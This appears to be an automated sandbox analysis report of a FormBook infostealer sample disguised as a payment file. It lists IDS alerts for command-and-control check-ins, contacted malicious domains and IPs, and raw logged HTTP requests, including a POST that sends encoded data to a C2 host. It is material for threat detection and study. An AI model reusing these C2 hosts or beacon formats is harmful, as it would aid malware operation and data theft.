                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49878 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50029 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50003 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50003 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50017 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50017 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50027 -> 104.21.34.103:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50027 -> 104.21.34.103:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50013 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50013 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49958 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50022 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50022 -> 209.74.77.107:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.soainsaat.xyz
                Source: DNS query: www.soainsaat.xyz
                Source: DNS query: www.amayavp.xyz
                Source: DNS query: www.duwixushx.xyz
                Source: Joe Sandbox ViewIP Address: 185.27.134.144 185.27.134.144
                Source: Joe Sandbox ViewASN Name: SAIC-ASUS SAIC-ASUS
                Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002D4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_002D4EB5
                Source: global trafficHTTP traffic detected: GET /xxr1/?6dr=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nb-shenshi.buzzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /sgdd/?6dr=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.laohub10.netConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /rq1s/?6dr=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF2aRhq0xPreKegZNgRyigK2URQJRetLL6xmvJtnHWTfyzSbGWdrg=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.xcvbj.asiaConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /rum2/?6dr=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBkidEg+kRQXv4obyNPkBDCtbUb3LL9ptfYbieFsxGE9yCAarRKSI=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.soainsaat.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /d9ku/?6dr=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.amayavp.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /vg0z/?6dr=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTFrWSncccbEBJ6T2ZUmHvVL3BVpynffLQ4AgBix/2srBcYLhAIes=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.vayui.topConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /o362/?Kp=6N8LUn6pGPW&6dr=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqA0qO3SSFE3YHITh7+9T1aVwk8yasaXm8yz75cRrj4u8mi8kZiIg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.rgenerousrs.storeConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /jhb8/?6dr=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv3IFg7wS9Zfpqa2312nFAQ2OMwXhW64NslbGydbZxuWxpmOq3INM=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.t91rl7.proConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /alu5/?Kp=6N8LUn6pGPW&6dr=m83uTjDkEXAXcvpaGmUoJ8Y4XcRIkh2fMbxp9Jcjydk1OP9q/x+Uq7Puqw1bWxP8wchYD7Gqx/Fq8mp+rVpxo2CL5VTj7SrR/OegDMXRn69R6rST1isaHd8Em6LhDwUu8jHHb1w= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.learnwithus.siteConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /1jao/?6dr=wXeCFQWa9OsffQZ2WhWSf1ZyxcnJa4mUhyyCbFo+uZizrpQ17AwBRErPIC2GsWEsFfVeFw/t98C8OszppSdM03IMcNL7coNMrr+HJhleldbbhLhSE02VC7Ooq1hKOjwi60t3Eow=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.rafconstrutora.onlineConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /n7xy/?6dr=9kSByHmOdk8FUTJoiY9dxdy2O5k/Hm0rzNXDmTbYjaiqM3Vah8l/01w+tC+kGtOMFeVLDvKv+EgDTRurueNShPDfBTXGcQl1Rn1iXwPoeM4M+DqRn9nIdXP5s7w9IXv4aM6Qswk=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.7vh2wy.topConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /q0vk/?Kp=6N8LUn6pGPW&6dr=TqE1JZ2PW3JWY2ub7wbyGmkAFORXr7+yOAYp2neLNqkwqfDGdEjMQdAOFdDc8sxV6WeqUhb2JmW0DlQMLtnU5QjuOQNkNi2JEE5AET6tFv2ZXVhBmCTejYrGfFb1t6Bzh+26W2w= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.duwixushx.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficDNS traffic detected: DNS query: www.nb-shenshi.buzz
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: global trafficDNS traffic detected: DNS query: www.xcvbj.asia
                Source: global trafficDNS traffic detected: DNS query: www.soainsaat.xyz
                Source: global trafficDNS traffic detected: DNS query: www.amayavp.xyz
                Source: global trafficDNS traffic detected: DNS query: www.vayui.top
                Source: global trafficDNS traffic detected: DNS query: www.rgenerousrs.store
                Source: global trafficDNS traffic detected: DNS query: www.t91rl7.pro
                Source: global trafficDNS traffic detected: DNS query: www.learnwithus.site
                Source: global trafficDNS traffic detected: DNS query: www.cuthethoi.online
                Source: global trafficDNS traffic detected: DNS query: www.rafconstrutora.online
                Source: global trafficDNS traffic detected: DNS query: www.7vh2wy.top
                Source: global trafficDNS traffic detected: DNS query: www.duwixushx.xyz
                Source: unknownHTTP traffic detected: POST /sgdd/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-USHost: www.laohub10.netOrigin: http://www.laohub10.netReferer: http://www.laohub10.net/sgdd/Cache-Control: no-cacheContent-Length: 208Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 MobileData Raw: 36 64 72 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 65 34 36 63 61 31 4d 5a 39 73 73 51 66 6c 58 34 69 6a 2f 61 2b 57 44 44 38 76 72 6e 51 68 2f 4a 59 47 78 75 50 78 63 4b 77 47 55 50 Data Ascii: 6dr=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLe46ca1MZ9ssQflX4ij/a+WDD8vrnQh/JYGxuPxcKwGUP
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:53:45 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 27 Nov 2024 07:55:03 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-11-27T07:55:08.0915773Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uNuHMovBEZ%2Bn4NWml1LVp5qOBo5m8swT6H3kMl8%2BA4ZcgInj26eny%2FXEWCtRl0%2BbSaaqMYKUrjZ1rI%2FPCvibsl5teb9X6HHENPrIwx3lttsuN2YUZugFJKT1v0krYDwr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e908e497dec4388-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1638&rtt_var=819&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=746&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NoxhpH51T1yxFOujIFCghAtMu40ZpYJulPcksZgpzYC27g0QtQa91iDPgFY9rXCeVtvVjr07y3SYmFTqniHeE%2BteVMzsxWDv1%2F%2BqTs70%2BAtlyVrK10yIYHKZe3B3o04p"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e908e5b38e443a7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2033&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fCc2KcmjLsV8PRD2ugtrUvOmlYgXI12iciS4Dsakf1T0Vz61GK8J5F9MwViNSx45p6RJi9hUCQDooJtqGRVoBstbVXME8ADSHLJ%2FIjFWLGcGNaTLsOiqopq4S5%2BtyyF0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e908e6bfb8c8cc0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1783&rtt_var=891&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1783&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zsSNk94fbpZn0%2FKtIyaVjlxRad66c1nRYsDOZ9VViVYiLjz%2F8mE3SXCK3j3%2FrX0kxLEJAhhz6SkWaDMUQfEEr7myJC9sj7PScMglQpYTHQ4mD8Kv69j3nKjSiddomww7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e908e7caeb34386-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1573&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=495&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:40 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lFckI5tGqzTEcjNp4DuYGxsjwG0Nn7U0zbtwrU3rw9xBXIOnEoqMJaGdQsg6sJjMOny38I0pt5EHzqKx1ILVgzfUbYAjCwvKZrFu5QJ6qbyqkaVxhWMd0LwzhXoTO9WZSw9wagab%2Bgs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e908ea6df277274-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 